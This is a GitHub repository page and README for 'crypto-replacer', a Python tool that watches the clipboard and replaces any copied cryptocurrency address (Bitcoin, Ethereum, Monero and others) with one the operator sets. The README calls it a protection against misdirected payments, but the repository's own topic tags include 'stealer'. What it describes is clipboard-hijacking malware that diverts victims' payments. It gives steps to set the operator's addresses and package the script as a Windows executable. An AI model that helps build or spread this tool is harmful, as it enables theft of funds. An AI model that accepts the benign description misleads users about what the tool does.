https://github.com/matifanger/crypto-replacer
This script is a tool to automatically replace cryptocurrency addresses in the clipboard with a predefined address. This can be useful to avoid accidentally sending cryptocurrency to the wrong address.
https://github.com/matifanger/crypto-replacer
address clipboard cpp crypto python replacer stealer
Last synced: 3 months ago
JSON representation
This script is a tool to automatically replace cryptocurrency addresses in the clipboard with a predefined address. This can be useful to avoid accidentally sending cryptocurrency to the wrong address.
- Host: GitHub
- URL: https://github.com/matifanger/crypto-replacer
- Owner: matifanger
- Created: 2022-01-23T18:53:29.000Z (over 3 years ago)
- Default Branch: master
- Last Pushed: 2022-12-01T00:40:58.000Z (almost 3 years ago)
- Last Synced: 2023-05-21T02:26:40.091Z (over 2 years ago)
- Topics: address, clipboard, cpp, crypto, python, replacer, stealer
- Language: Python
- Homepage:
- Size: 250 KB
- Stars: 13
- Watchers: 2
- Forks: 6
- Open Issues: 6
-
Metadata Files:
- Readme: readme.md
Awesome Lists containing this project
README
CRYPTO REPLACER
# Description 📌
This script is a tool to automatically replace cryptocurrency addresses in the clipboard with a predefined address. This can be useful to avoid accidentally sending cryptocurrency to the wrong address.
## Starting 🚀
### Requirements:
```
pyperclip
time
re
ctypes
os
sys
inspect
```### Downloading:
```
git clone https://github.com/matifanger/crypto-replacer
cd crypto-replacer
pip3 install -r requirements.txt
```## Configuring ⚙️
Open (`crypto-replacer.py`).
Look for variable (`my_addresses`) and setup with anything you want.### Making the binaries:
When the configuration is done you should make the executable (`.exe`) to work in windows.
```
pip install auto-py-to-exe
```then
```
auto-py-to-exe
```In Auto Py To Exe (Mandatory)
```
One directory
Console based
```Proper usage [here](https://pypi.org/project/auto-py-to-exe/)
## Regex cryptos - Supported 📖
- Bitcoin
- Ethereum
- Dash
- Cardano
- Polkadot
- Ripple
- Tron
- Litecoin
- Monero
- Doge
- Solana## Todo 📄
- [x] Add more cryptos
- [ ] Add linux support